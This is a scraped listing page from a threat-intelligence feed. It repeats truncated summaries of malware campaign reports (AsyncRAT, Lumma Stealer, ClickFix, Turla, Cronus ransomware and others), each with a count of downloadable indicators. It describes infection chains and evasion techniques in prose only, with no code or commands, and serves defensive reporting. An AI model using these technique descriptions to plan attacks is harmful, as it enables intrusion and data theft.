Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
